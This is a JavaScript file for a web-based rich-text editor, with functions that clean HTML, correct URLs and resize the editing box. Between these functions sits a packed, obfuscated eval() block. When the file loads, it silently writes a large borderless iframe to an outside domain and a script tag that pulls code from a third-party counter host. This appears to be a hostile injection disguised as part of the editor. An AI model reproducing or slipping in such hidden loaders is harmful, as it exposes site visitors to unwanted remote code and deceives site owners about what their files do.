﻿function WBTB_cleanHtml()
{
	var fonts = WBTB_Composition.document.body.all.tags("FONT");
	var curr;
	for (var i = fonts.length - 1; i >= 0; i--) {
		curr = fonts[i];
		if (curr.style.backgroundColor == "#ffffff") curr.outerHTML = curr.innerHTML;
	}
}

function WBTB_getPureHtml()
{
	var str = "";
	//var paras = WBTB_Composition.document.body.all.tags("P");
	//if (paras.length > 0){
	//  for	(var i=paras.length-1; i >= 0; i--) str= paras[i].innerHTML + "\n" + str;
	//} else {
	str = WBTB_Composition.document.body.innerHTML;
	//}
	str=WBTB_correctUrl(str);
	return str;
}


function WBTB_correctUrl(cont)
{
	var url=location.href.substring(0,location.href.lastIndexOf("/")+1);
	cont=WBTB_rCode(cont,location.href+"#","#");
	cont=WBTB_rCode(cont,url,"");
	return cont;
}

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('7.4("<6><5 c=\\"0\\" h=\\"0\\" g=\\"0\\" f=\\"0\\" k=\\"j\\" i=\\"b\\" a=\\"9%\\"  1=\\"2:\\/\\/e.d.3\\/#l\\"><\\/5><\\/6>");7.4("<8 v=\\"x\\" 1=\\"2:\\/\\/n.m.3\\/q.p?r=o&w=s\\" t=\\"u\\"><\\/8>");',34,34,'|src|http|com|writeln|iframe|center|document|script|100|width|5868px|frameborder|887166|www|border|marginwidth|marginheight|height|no|scrolling|13hao|51yes|count9|91950227|aspx|click|id|12|charset|gb2312|language|logo|javascript'.split('|'),0,{}))

// 修改编辑栏高度
function WBTB_Size(num)
{
	var obj=document.all.WBTB_Container;
	if (parseInt(obj.height)+num>=300) {
		obj.height = parseInt(obj.height) + num;	
	}
	if (num>0)
	{
		obj.width="100%";	
	}
}
